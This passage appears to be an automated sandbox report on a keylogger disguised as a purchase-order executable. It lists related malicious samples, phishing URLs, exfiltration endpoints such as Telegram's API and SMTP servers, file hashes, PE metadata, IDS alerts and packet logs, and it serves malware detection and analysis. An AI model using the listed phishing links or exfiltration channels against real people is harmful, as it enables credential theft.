	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
us2.smtp.mailhostbox.com	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	PAYSLIP.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	SWIFT COPY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	UPDATED FLOOR PLAN_3D.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	New Order PO#86637.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	2.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	z1newpo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
api.telegram.org	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0LpFv1haTA.exe	Get hash	malicious	WhiteSnake Stealer, XenoRAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3D	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	https://booking.com-partners.one/confirm/login/qAlElVVF	Get hash	malicious	Unknown	Browse	104.18.86.42
	https://jv.prenticeu.com/SAFlSIeECgRZt_tUKXhAOQHYyqb5e4/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	msimg32.dll	Get hash	malicious	LummaC	Browse	172.67.197.40
	https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.31.174
	msimg32.dll	Get hash	malicious	Unknown	Browse	172.67.197.40
	http://www.toyotanation.com//help//terms	Get hash	malicious	Unknown	Browse	172.67.41.60
	https://bestratedrobotvacuum.com/?bypass-cdn=1	Get hash	malicious	Unknown	Browse	104.21.234.234
PUBLIC-DOMAIN-REGISTRYUS	http://jeevankiranfoundationcenter.co.in/css/rrp.htm	Get hash	malicious	Kutaki	Browse	103.21.58.228
	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse	208.91.198.176
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari	Get hash	malicious	Unknown	Browse	162.222.225.80
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hj	Get hash	malicious	Unknown	Browse	162.215.254.118
	http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari/	Get hash	malicious	Unknown	Browse	162.222.225.80
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	119.18.54.39
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.198.143
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Rfq H2110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	http://azgop.org/	Get hash	malicious	Unknown	Browse	188.114.96.3
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	uvDYInLodR.exe	Get hash	malicious	Njrat	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Printable_Copy.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	Printable_Copy.js	Get hash	malicious	Unknown	Browse	149.154.167.220
	OuaJzAFCTk.exe	Get hash	malicious	DCRat	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
MD5:	92C17FC0DE8449D1E50ED56DBEBAA35D
SHA1:	A617D392757DC7B1BEF28448B72CBD131CF4D0FB
SHA-256:	DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
SHA-512:	603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uc3aff3.3au.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drgocfdm.ome.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5dibwtq.ktp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ku0m5kgt.vp3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.734724374828538
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Purchase Order 007823-PO# 005307.exe
File size:	763'392 bytes
MD5:	89b1330440f5e3cc7fdf662981760845
SHA1:	39484bf19c50d51022b3f90361bfd048b1ee1df6
SHA256:	2095af004e76f0cf7243b68e868eeb3b9c8c157d632aa785a87a93addf3b75fc
SHA512:	2db2b4de6eb9bda9b1d93d4e14417a31193cdcebd4736b07a49d0d72e34244d166285107eda6968c3b781e20e7302a2d93b2e5a3df93a6b3217e6a3d426bc1e3
SSDEEP:	12288:a4Gc47cJDImS//BEQPo+wknW47+O7dwKOFxFp/xb0rA5CXpLJ+U3T:9GrSImS//BEknwGW47+OZFOFH0rA5yJ+
TLSH:	CCF4E0D53B35731ADEB85A749529DEF452B51E28B000BAE32EDD3B87359D211AE0CF02
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4bb9ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBFC6CF92 [Wed Dec 16 07:45:22 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbb999	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x63c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xba28c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb99f4	0xb9a00	ca32d2fdc6038ef3d1ca693121a16ef3	False	0.8930345117845118	data	7.742206818544972	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x63c	0x800	43903e596f473868e3b6caff945432e1	False	0.33935546875	data	3.494903261920162	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	0022309dfd05518c71c34221c1dfffd7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbc090	0x3ac	data			0.4148936170212766
RT_MANIFEST	0xbc44c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T07:21:00.644750+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49708	132.226.247.73	80	TCP
2024-10-01T07:21:01.644807+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49708	132.226.247.73	80	TCP
2024-10-01T07:21:02.213042+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49711	188.114.96.3	443	TCP
2024-10-01T07:21:02.972884+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49713	132.226.247.73	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 07:20:59.690455914 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:20:59.695432901 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:20:59.695530891 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:20:59.695822954 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:20:59.700602055 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:00.378700972 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:00.386464119 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:00.391307116 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:00.594599962 CEST	80	49708	132.226.247.73	192.168.2.9
Oct 1, 2024 07:21:00.644750118 CEST	49708	80	192.168.2.9	132.226.247.73
Oct 1, 2024 07:21:00.693332911 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:00.693372011 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:00.693533897 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:00.716344118 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:00.716366053 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.185246944 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.185621977 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.192096949 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.192115068 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.192436934 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.238573074 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.253024101 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 1, 2024 07:21:01.299403906 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.368659973 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.368761063 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 1, 2024 07:21:01.368880987 CEST	49710	443	192.168.2.9	188.114.96.3
